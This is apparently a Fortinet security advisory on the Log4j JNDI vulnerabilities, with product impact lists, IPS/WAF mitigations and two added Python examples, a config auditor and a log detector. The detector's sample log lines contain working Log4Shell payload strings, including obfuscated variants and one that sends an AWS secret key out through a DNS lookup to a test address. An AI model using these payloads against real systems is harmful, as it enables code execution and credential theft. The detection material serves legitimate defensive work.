PSIRT Advisories

Apache log4j2 log messages substitution (CVE-2021-44228)

Summary

Apache Log4j <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled (CVE-2021-44228).


See the Fortinet Blog for more detail: https://www.fortinet.com/blog/psirt-blogs/apache-log4j-vulnerability

Affected Products

The following products are NOT impacted:


FortiADC
FortiAI
FortiAnalyzer
FortiAP
FortiAP-U
FortiAuthenticator
FortiCache
FortiCarrier
FortiClient (All versions)
FortiClientEMS
FortiConnect
FortiConverter
FortiDDoS
FortiDDoS-F
FortiDeceptor
FortiEDR Agent
FortiExtender
FortiMail
FortiManager
FortiNAC
FortiOS (includes FortiGate & FortiWiFi)
FortiPresence
FortiProxy
FortiRecorder (includes FortiCamera)
FortiSandbox
FortiSASE
FortiSOAR
FortiSwitch & FortiSwitchManager
FortiTester
FortiToken & FortiToken Mobile
FortiVoice (includes FortiPhone)
FortiWeb
FortiWLC
FortiWLM


FortiAnalyzer Cloud
FortiClient Cloud
FortiExtender Cloud
FortiGate Cloud
FortiGSLB Cloud
FortiLAN Cloud (includes Switch & AP)
FortiManager Cloud
FortiPenTest
FortiPhish Cloud
FortiToken Cloud
FortiWeb Cloud


The following products are impacted and fixes are being worked on. This advisory will be updated as soon as ETAs are available:


FortiAIOps - Fixed in version 1.0.2
FortiAnalyzer BigData - Fixed on 2021-12-10 in 6.4.7 & 7.0.2
FortiCASB - Fixed on 2021-12-10
FortiConverter Portal - Fixed on 2021-12-10
FortiCWP - Fixed on 2021-12-10
FortiEDR Cloud - Not exploitable. Additional precautionary mitigations put in place on 2021-12-10
FortiInsight - Not exploitable. Additional precautionary mitigations being investigated.
FortiIsolator - Fix scheduled for version 2.3.4
FortiMonitor - Mitigations for NCM & Elastiflow available
FortiPortal - Fixed in 6.0.8 and 5.3.8
FortiSIEM - Mitigation available
ShieldX - Fix scheduled for versions 2.1 and 3.0 - ETA 2021/12/17


Update:  CVE-2021-45046 (CVSS score: 3.9 - Low)

The Apache Software Foundation (ASF) found that the fix it released for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example ${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC), an attacker with control over Thread Context Map (MDC) input data can craft malicious input using a JNDI Lookup pattern, resulting in a denial of service (DoS).
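The precondition described above is a property of the Log4j configuration, not of the input, so it can be checked before an attacker does. The following is an added example (not Fortinet or ASF code) that audits a log4j2.xml for PatternLayouts that reference Thread Context Map data through a conversion pattern (%X, %mdc, %MDC) or a Context Lookup (${ctx:...}, normally written $${ctx:...} in a configuration so that it is evaluated per log event). Both configurations in the block are constructed for the example.

```python
"""Audit a log4j2.xml for the CVE-2021-45046 precondition.

Added example for this advisory, not Fortinet or ASF code. The 2.15.0 fix
left an attacker who controls Thread Context Map data a path to a JNDI
lookup only when a PatternLayout refers to that data, either through a
Thread Context Map conversion pattern (%X, %mdc, %MDC) or through a
Context Lookup (${ctx:...}, written $${ctx:...} in a config so that it is
evaluated per event). audit() lists every appender whose layout does.
Both configurations below are constructed.
"""
import re
import xml.etree.ElementTree as ET

# (regex, reason): the two layout features named in the ASF description.
_CONTEXT_REFS = [
    (re.compile(r"%(?:X|mdc|MDC)\b"), "Thread Context Map pattern (%X / %mdc / %MDC)"),
    (re.compile(r"\$\$?\{ctx:"), "Context Lookup (${ctx:...})"),
]


def _layout_patterns(layout):
    """Yield the pattern strings a <PatternLayout> carries, whether given
    as a pattern="..." attribute or as a <Pattern> child element."""
    if layout.get("pattern"):
        yield layout.get("pattern")
    for child in layout.findall("Pattern"):
        if child.text and child.text.strip():
            yield child.text.strip()


def audit(config_xml: str):
    """Return one finding per (appender, pattern, reason) that matches."""
    root = ET.fromstring(config_xml)
    findings = []
    appenders = root.find("Appenders")
    if appenders is None:
        return findings
    for appender in appenders:
        for layout in appender.iter("PatternLayout"):
            for pattern in _layout_patterns(layout):
                for regex, reason in _CONTEXT_REFS:
                    if regex.search(pattern):
                        findings.append({
                            "appender": appender.get("name"),
                            "type": appender.tag,
                            "pattern": pattern,
                            "reason": reason,
                        })
    return findings


# Constructed configuration: both appenders expose Thread Context Map data.
VULNERABLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d %-5p [%t] user=%X{user} sess=$${ctx:session} %m%n"/>
    </Console>
    <File name="Audit" fileName="audit.log">
      <PatternLayout>
        <Pattern>%d %-5p tenant=%mdc{tenant} %m%n</Pattern>
      </PatternLayout>
    </File>
  </Appenders>
  <Loggers>
    <Root level="info">
      <AppenderRef ref="Console"/>
      <AppenderRef ref="Audit"/>
    </Root>
  </Loggers>
</Configuration>
"""

# Same configuration with the context references removed.
SAFE_CONFIG = VULNERABLE_CONFIG.replace(
    "user=%X{user} sess=$${ctx:session} ", "").replace("tenant=%mdc{tenant} ", "")

if __name__ == "__main__":
    for f in audit(VULNERABLE_CONFIG):
        print(f"{f['type']} '{f['appender']}': {f['reason']} in pattern {f['pattern']!r}")
    print("safe config findings:", audit(SAFE_CONFIG))
```

Run it against the deployed log4j2.xml of each Java service that is still on 2.15.0; a hit means the service is in the non-default configuration the update above describes and should be treated as affected rather than as fixed. Properties, YAML and JSON configurations would need their own loader (not shown).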


Products marked NOT impacted remain so. Additionally, the following products are not impacted, or their previous fix also covers CVE-2021-45046:

FortiAIOps
FortiConverter Portal
FortiEDR Cloud
FortiPortal

Solutions

For full details of protections and detections for the IoCs related to this vulnerability, please see the Log4j2 Vulnerability Outbreak Alert (https://www.fortiguard.com/outbreak-alert/log4j2-vulnerability).


IPS Signature protection (FortiOS)

Fortinet has released IPS signature Apache.Log4j.Error.Log.Remote.Code.Execution (VID 51006) to address this threat. This signature was initially released in IPS package version 19.215. Please note that, since this was an emergency release, the default action for this signature was set to pass; modify the action according to your needs.
As of IPS DB version 19.217 the default action for this signature is drop.


IPS Signature protection (FortiADC & FortiProxy)

FortiADC supports the IPS signature to mitigate log4j (version 19.215).
FortiProxy supports the IPS signature to mitigate log4j (version 19.215).


Web Application Firewall (FortiWeb & FortiWeb Cloud)

Web Application signatures to prevent this vulnerability were first added in database 0.00305 and have been updated in recent releases to add additional coverage.
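The signatures above, and the lookup substitution described in the Summary, both come down to the same thing on the wire: a Log4j 2 lookup of the form ${jndi:<scheme>:...} arriving in a logged field (User-Agent, URI, header). The following is an added example, not Fortinet code and not a reproduction of the IPS or FortiWeb signatures, that scans web-server log lines for that class of input after undoing the obfuscations attackers use to defeat a plain "${jndi:" substring match (nested ${lower:j}, ${::-j} and ${env:NOPE:-j} lookups, URL-encoding). It goes slightly beyond the advisory text by resolving nested lookups generically rather than matching a fixed list of variants. All log lines in the block are constructed; the addresses are RFC 5737 test ranges.

```python
"""Log4Shell (CVE-2021-44228) lookup-string detector over web log lines.

Added example for this advisory: not Fortinet code, and not the FortiGate
IPS signature (VID 51006) or the FortiWeb signatures. It flags the class
of input those signatures target, a Log4j 2 lookup ${jndi:<scheme>:...},
after resolving the nested lookups (${lower:j}, ${::-j}, ${env:NOPE:-j})
and URL-encoding commonly used to hide it. All log lines are constructed.
"""
import re
from urllib.parse import unquote

# Innermost ${...}: a lookup body containing no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{(?P<body>[^${}]*)\}")
# A jndi lookup and its scheme, e.g. ${jndi:ldap:... or ${jndi:rmi:...
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z][a-z0-9+.-]*):", re.IGNORECASE)


def _resolve(body: str):
    """Literal text one innermost lookup yields, mirroring the Log4j 2
    behaviour obfuscation relies on: ${lower:J} -> j, ${upper:j} -> J, and
    an unset key falls back to its ':-' default (${::-j} -> j). Returns
    None for values we cannot know (e.g. ${env:HOSTNAME}); those lookups
    are left in place for the analyst to see."""
    key, sep, rest = body.partition(":")
    key = key.lower()
    if sep and key in ("lower", "upper"):
        return rest.lower() if key == "lower" else rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode (bounded), then resolve nested non-jndi lookups inside
    out. jndi lookups are deliberately kept so the detector can see them."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group("body")
            if body.lower().startswith("jndi:"):
                return m.group(0)
            value = _resolve(body)
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def _extract_lookup(text: str, start: int) -> str:
    """Return the ${...} beginning at `start`, honouring nested braces."""
    depth, i = 0, start
    while i < len(text):
        if text.startswith("${", i):
            depth, i = depth + 1, i + 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i + 1]
        i += 1
    return text[start:]


def scan_line(line: str):
    """{'scheme', 'lookup', 'normalized'} for a line carrying a jndi
    lookup, or None for a clean line."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group("scheme").lower(),
            "lookup": _extract_lookup(norm, m.start()), "normalized": norm}


def scan(lines):
    """Scan many lines; returns (line_number, scheme, lookup) per hit."""
    return [(n, h["scheme"], h["lookup"]) for n, line in enumerate(lines, 1)
            if (h := scan_line(line))]


# Constructed Apache-style access log lines (RFC 5737 test addresses).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:${lower:rmi}://198.51.100.7:1099/x}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A//198.51.100.7/z%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /api HTTP/1.1" 200 10 "-" "${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.7}"',
]

if __name__ == "__main__":
    for n, scheme, lookup in scan(SAMPLE_LINES):
        print(f"line {n}: jndi scheme={scheme} lookup={lookup}")
```

The scheme is worth keeping in the alert: ldap, ldaps and rmi indicate a remote-class-loading attempt, while dns is typically the blind callback used to confirm a vulnerable host, as in the last sample line, where the attacker also tries to exfiltrate an environment variable through the hostname. Because the normalizer keeps unknown lookups (such as ${env:...}) intact, that exfiltration attempt remains visible in the reported lookup.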

Using FortiAnalyzer to detect activities related to exploits of Apache Log4j2 vulnerability


Last Updated: Tuesday December 15, 8:50 PM Pacific Time